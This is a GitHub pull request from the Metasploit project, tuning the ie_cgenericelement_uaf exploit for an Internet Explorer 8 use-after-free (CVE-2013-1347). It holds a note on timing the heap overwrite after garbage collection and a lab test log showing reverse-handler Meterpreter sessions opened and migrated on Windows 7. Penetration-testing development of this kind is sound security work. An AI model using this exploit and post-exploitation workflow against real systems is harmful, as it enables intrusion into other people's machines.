Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

A slight change for stability #1810

Merged
merged 1 commit into from May 9, 2013
Merged

A slight change for stability #1810

merged 1 commit into from May 9, 2013

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented May 9, 2013

While updating ie_cgenericelement_uaf earlier today, I noticed the changes made it a tiny bit less stable. Juan's test log in #1809 also kinda shows that (with the first attempt failing), so I decided to go back and move the string crafting part, that way between CollectGarbage() and the overwrite, there is less noise, and hopefully more stable. I did a few tests, seems better.

@wchen-r7
A slight change for stability
9043eed 
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in rapid7#1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable.  I did a few tests, seems better.
@jvazquez-r7
Copy link
Contributor

Testing again!

Results on Windows 7 / IE8

10 tries / 7 sessions, which is good enough for me to merge :) @wchen-r7 if you remember better results before adding support for use of the msf apis let me know and we can revert, but I guess shouldn't be a difference in reliability terms.

[*] Started reverse handler on 192.168.0.6:4444 
[*] Using URL: http://0.0.0.0:8080/WzNfJajpCSdD17M
[*]  Local IP: http://192.168.0.6:8080/WzNfJajpCSdD17M
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.6:4444 -> 192.168.0.6:49651) at 2013-05-08 21:46:21 -0500
[*] Session ID 1 (192.168.0.6:4444 -> 192.168.0.6:49651) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3964)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2256
[+] Successfully migrated to process 
[*] 192.168.172.187 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 2 opened (192.168.0.6:4444 -> 192.168.0.6:49679) at 2013-05-08 21:46:53 -0500
[*] Session ID 2 (192.168.0.6:4444 -> 192.168.0.6:49679) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2444)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 584
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 3 opened (192.168.0.6:4444 -> 192.168.0.6:49692) at 2013-05-08 21:47:11 -0500
[*] 192.168.172.187 - Meterpreter session 2 closed.  Reason: Died
[*] Session ID 3 (192.168.0.6:4444 -> 192.168.0.6:49692) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1940)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3916
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 4 opened (192.168.0.6:4444 -> 192.168.0.6:49724) at 2013-05-08 21:47:33 -0500
[*] 192.168.172.187 - Meterpreter session 3 closed.  Reason: Died
[*] Session ID 4 (192.168.0.6:4444 -> 192.168.0.6:49724) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2672)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1804
[-] Could not migrate in to process.
[-] Broken pipe
[*] 192.168.172.187 - Meterpreter session 4 closed.  Reason: Died
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 5 opened (192.168.0.6:4444 -> 192.168.0.6:49753) at 2013-05-08 21:47:50 -0500
[*] Session ID 5 (192.168.0.6:4444 -> 192.168.0.6:49753) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3728)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4084
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 6 opened (192.168.0.6:4444 -> 192.168.0.6:49789) at 2013-05-08 21:48:20 -0500
[*] Session ID 6 (192.168.0.6:4444 -> 192.168.0.6:49789) processing InitialAutoRunScript 'migrate -f'
[*] 192.168.172.187 - Meterpreter session 5 closed.  Reason: Died
[*] Current server process: iexplore.exe (3272)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2708
[+] Successfully migrated to process 
[*] 192.168.172.187 - Meterpreter session 6 closed.  Reason: Died
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 7 opened (192.168.0.6:4444 -> 192.168.0.6:49847) at 2013-05-08 21:49:22 -0500
[*] Session ID 7 (192.168.0.6:4444 -> 192.168.0.6:49847) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2444)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2652
[+] Successfully migrated to process

jvazquez-r7 pushed a commit that referenced this pull request May 9, 2013
Land #1810, @wchen-r7's modification to make ie_cgenericelement_uaf m…
94f841d 
…ore stable
@jvazquez-r7 jvazquez-r7 merged commit 9043eed into rapid7:master May 9, 2013
@wchen-r7 wchen-r7 deleted the cve_2013_1347_update_2 branch August 22, 2016 16:24
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wchen-r7 @jvazquez-r7